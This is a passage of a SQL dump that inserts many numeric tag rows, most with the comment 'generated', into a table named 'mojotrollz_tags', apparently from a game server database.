`type`, `value`, `comment`) VALUES (176823, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176823, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176823, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176824, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176824, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176824, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176824, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176825, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176825, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176825, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176825, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176826, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176826, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176826, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176826, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176827, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176827, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176827, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176827, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176828, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176828, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176828, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176828, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176829, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176829, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176829, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176829, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176830, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176830, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176830, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176830, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176831, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176831, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176831, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176831, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176832, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176832, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176832, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176832, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176833, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176833, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176833, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176833, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176834, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176834, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176834, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176834, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176835, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176835, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176835, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176835, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176836, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176836, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176836, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176836, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176837, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176837, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176837, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176837, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176838, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176838, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176838, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176838, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176839, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176839, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176839, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176839, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176840, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176840, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176840, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176840, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176841, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176841, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176841, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176841, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176842, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176842, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176842, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176842, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176843, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176843, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176843, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176843, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176844, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176844, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176844, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176844, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176845, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176845, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176845, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176845, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176846, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176846, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176846, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176846, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176847, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176847, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176847, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176847, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176848, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176848, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176848, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176848, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176849, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176849, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176849, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176849, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176850, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176850, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176850, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176850, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176851, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176851, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176851, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176851, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176852, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176852, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176852, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176852, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176853, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176853, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176853, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176853, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176854, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176854, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176854, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176854, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176855, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176855, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176855, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176855, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176863, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176865, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176885, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176886, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176887, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176888, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176889, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176890, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176891, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176892, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176894, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176895, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176896, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176897, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176898, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176899, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176901, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176904, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176905, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176905, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176905, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176905, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176906, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176906, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176906, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176906, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176907, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176907, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176907, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176907, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176908, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176908, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176908, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176908, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176909, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176909, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176909, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176909, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176910, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176910, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176910, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176910, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176911, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176911, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176911, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176911, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176912, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176912, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176912, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176912, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176913, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176913, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176913, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176913, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176914, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176914, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176914, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176914, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176915, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176915, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176915, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176915, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176916, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176916, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176916, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176916, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176917, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176917, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176917, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176917, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176918, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176918, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176918, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176918, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176919, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176919, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176919, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176919, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176920, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176920, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176920, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176920, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176921, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176921, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176921, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176921, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176922, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176922, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176922, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176922, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176924, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176944, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176945, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176946, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176947, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176948, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176949, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176950, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176951, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176951, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176951, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176951, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176952, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176952, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176952, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176952, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176953, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176953, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176953, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176953, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176954, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176954, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 